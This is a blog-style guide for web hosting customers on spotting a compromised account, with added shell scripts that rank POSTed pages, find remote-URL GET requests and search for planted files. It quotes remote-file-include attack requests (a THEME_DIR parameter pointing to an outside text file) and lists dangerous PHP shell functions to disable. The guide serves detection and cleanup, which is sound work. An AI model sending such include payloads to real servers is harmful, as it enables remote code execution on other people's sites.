HOW TO: Know if You’ve Been Hacked
I frequently clean cracked WestHost accounts, but sometimes they are not actually cracked, or the cause is a little hard to track down.
Here is a guide to what to look for if you think something might be compromised. Some of this information is specific to WestHost accounts purchased before Nov. 2009, but I've included material that covers other accounts so it translates to other systems, platforms and hosts.
- Location, Location, Location
- PHP Variables
- Modification Dates
- Got POST?
- Check for Strange Files in /tmp
- Check Your Process List for Anything Suspicious
- Know Your Log Files
- Run Some Command Line Checks
- Document
- Google’s Your Friend
- Repetition, Repetition, Repetition
Where is the malicious content first found? 9 times out of 10 it will be in a subdirectory of a specific PHP application, and that application is usually the one that was exploited.
Below are commonly exploited PHP functions and settings. Ensure the 3 below are disabled if at all possible (or enabled only for the directory that needs them).
Quick check of /etc/php.ini variables:
disable_functions = passthru,proc_open,shell_exec,system ; ensure these are in the list
register_globals = Off
allow_url_fopen = Off
allow_url_include = Off
Shared accounts in the cPanel system do not have access to the server-level php.ini file, but you can use local PHP configuration files instead. Here's a great link to a forum post with information on how to do so: http://forums.westhost.com/showthread.php?t=14325
What are the modification times on the files? This is very important because it tells you how old the hack is. If you know when it was put there, you can examine the log files for anything suspicious around that time.
Look for the pages that receive the most POST requests in the Apache logs. If there is a backdoor shell, it will typically show up near the top of that list.
/tmp is a common location for crackers to stash scripts.
If you see something, either install lsof and take a look at where it's executing from, or contact us to check for you.
Shared cPanel users will likely just want to contact Technical Support.
Do you know how to enable FTP logs, and where they are kept? The same goes for bash_history, access_logs and error_logs. Check them all.
cPanel provides access to the Apache log, but you can also tail system logs over SSH.
Run the command below (it prints the request line of each access_log entry and keeps only those carrying a query string) and look for any strange GET requests.
awk -F '"' '{print $2}' /var/log/httpd/access_log | grep -E '\?' | less
Example: GET /domain.html/default/theme.php?THEME_DIR=http://www.getit.pl///opinia/Ckrid1.txt?? HTTP/1.1
Example: GET /default/theme.php?THEME_DIR=http://www.getit.pl///opinia/Ckrid1.txt??
This command will work from the shared cPanel accounts.
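As an added example that is not part of the original post, the following script runs both log checks (the POST ranking from "Got POST?" and the remote-URL GET search above) over a handful of constructed Apache combined-format log lines. The hidden file path, the IP addresses and the example.net hostname in the sample lines are invented; run top_post_targets and remote_include_gets against your real access_log.

```shell
#!/bin/sh
# Added example, not from the original post: Apache access_log triage in awk.
# The log lines below are constructed (RFC 5737 test addresses, example.net).

# Write sample combined-format log lines to a temp file; print its path.
make_sample_log() {
    f=$(mktemp)
    cat > "$f" <<'EOF'
203.0.113.5 - - [10/Nov/2009:10:00:01 -0700] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Nov/2009:10:00:07 -0700] "GET /default/theme.php?THEME_DIR=http://example.net/x.txt?? HTTP/1.1" 200 311 "-" "libwww-perl/5.8"
198.51.100.9 - - [10/Nov/2009:10:01:12 -0700] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
198.51.100.9 - - [10/Nov/2009:10:02:40 -0700] "POST /images/.cache/x.php HTTP/1.1" 200 44 "-" "Mozilla/4.0"
198.51.100.9 - - [10/Nov/2009:10:02:41 -0700] "POST /images/.cache/x.php HTTP/1.1" 200 220 "-" "Mozilla/4.0"
198.51.100.9 - - [10/Nov/2009:10:02:45 -0700] "POST /images/.cache/x.php HTTP/1.1" 200 98 "-" "Mozilla/4.0"
203.0.113.77 - - [10/Nov/2009:10:03:02 -0700] "GET /blog/?p=12 HTTP/1.1" 200 8100 "-" "Mozilla/5.0"
EOF
    echo "$f"
}

# "Got POST?": POST targets ranked by hit count. In combined format the request
# line is the second double-quoted field, so -F'"' isolates it cleanly.
top_post_targets() {
    awk -F'"' '$2 ~ /^POST / {
                   split($2, r, " "); sub(/\?.*/, "", r[2]); n[r[2]]++
               }
               END { for (p in n) print n[p], p }' "$1" | sort -rn
}

# Just the most-POSTed path, for scripting.
top_post_target() {
    top_post_targets "$1" | head -n 1 | awk '{ print $2 }'
}

# The GET check from above, made precise: requests whose query string passes a
# remote URL as a parameter value (the remote-file-include pattern in the example).
remote_include_gets() {
    awk -F'"' '$2 ~ /^GET [^ ]*\?[^ ]*=(https?|ftp):\/\// { print $2 }' "$1"
}

count_remote_include_gets() {
    remote_include_gets "$1" | awk 'END { print NR }'
}

# Tie the log back to a file's modification time: every request in the minute
# the file appeared. $2 is the timestamp prefix exactly as Apache writes it.
requests_at() {
    grep -F "[$2" "$1"
}

# Demo run against the constructed log; substitute /var/log/httpd/access_log or
# the cPanel access log for a real account.
log=$(make_sample_log)
echo "== POST targets =="; top_post_targets "$log"
echo "== GETs passing a remote URL =="; remote_include_gets "$log"
echo "== requests at 10:02 =="; requests_at "$log" "10/Nov/2009:10:02"
```

On the sample data the hidden x.php under images/.cache tops the POST list with three hits, which is exactly the shape a backdoor leaves; requests_at then shows what else happened in the minute the file's mtime points to.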
Always document everything you've seen, everything you find and everything you do. If you have backups to restore your site from, make sure you save a copy of the hacked files, remove their permissions, and let Tech Support run a final check of the files in question.
Chances are that if someone has been hacked, it has happened a million times over to others running the same application. Typically there are forum posts on possible entry points and the like.
Hackers like to repeat things. Why? Because they use scripts to do their work for them. So if you find one instance, check for others in other files.
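To tie the modification-date, /tmp and repetition checks together, here is an added shell example (not from the original post). It builds a constructed account tree in a temp directory, with one old legitimate file, two freshly dropped files sharing the same marker comment, and an executable hidden in a scratch directory, then runs the three checks over it. The marker string CONSTRUCTED-MARKER and every path are invented; point the functions at your real public_html and /tmp.

```shell
#!/bin/sh
# Added example, not from the original post. The tree built here is constructed;
# the three check functions are what you would run against a real account.

# Modification dates: files under $1 changed within the last $2 minutes.
# Compare the result against your backup, then read the logs for that window.
recent_files() {
    find "$1" -type f -mmin "-$2"
}

# /tmp check: a file that is executable or carries a script extension in a
# scratch directory deserves an explanation (or lsof, to see what runs it).
suspicious_scratch_files() {
    find "$1" -type f \( -perm -100 -o -name '*.php' -o -name '*.pl' -o -name '*.sh' \)
}

# Repetition: once one planted file is found, search for the same literal marker
# everywhere else under the account. -F treats the marker as plain text.
files_with_marker() {
    grep -rlF -- "$2" "$1"
}

count_lines() { awk 'END { print NR }'; }

# Constructed sample account; prints the temp root it created.
make_sample_tree() {
    root=$(mktemp -d)
    mkdir -p "$root/public_html/images/.cache" "$root/public_html/blog" "$root/tmp"
    printf '<?php echo "welcome"; ?>\n' > "$root/public_html/index.php"
    printf '<?php /* CONSTRUCTED-MARKER */ echo "a"; ?>\n' > "$root/public_html/images/.cache/x.php"
    printf '<?php /* CONSTRUCTED-MARKER */ echo "b"; ?>\n' > "$root/public_html/blog/footer.php"
    printf 'release notes\n' > "$root/tmp/notes.txt"
    printf '#!/bin/sh\necho placeholder\n' > "$root/tmp/.runner"
    chmod 700 "$root/tmp/.runner"
    # The legitimate file predates the incident; everything else keeps a fresh mtime.
    touch -t 200901010000 "$root/public_html/index.php"
    echo "$root"
}

root=$(make_sample_tree)
echo "== files changed in the last 60 minutes =="; recent_files "$root/public_html" 60
echo "== suspicious files in scratch dir =="; suspicious_scratch_files "$root/tmp"
echo "== other files carrying the marker =="; files_with_marker "$root/public_html" CONSTRUCTED-MARKER
```

The marker search is where the repetition point pays off: a snippet copied from the first backdoor you find (a distinctive comment, an odd variable name) will usually surface every other copy the attacker's script dropped, including ones whose mtime was reset.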
I realize some of this may seem quite technical so please comment with your questions.
This could be expanded, but these steps are good places to check if you are worried about your account’s security. Have any other tricks you’d like to impart now?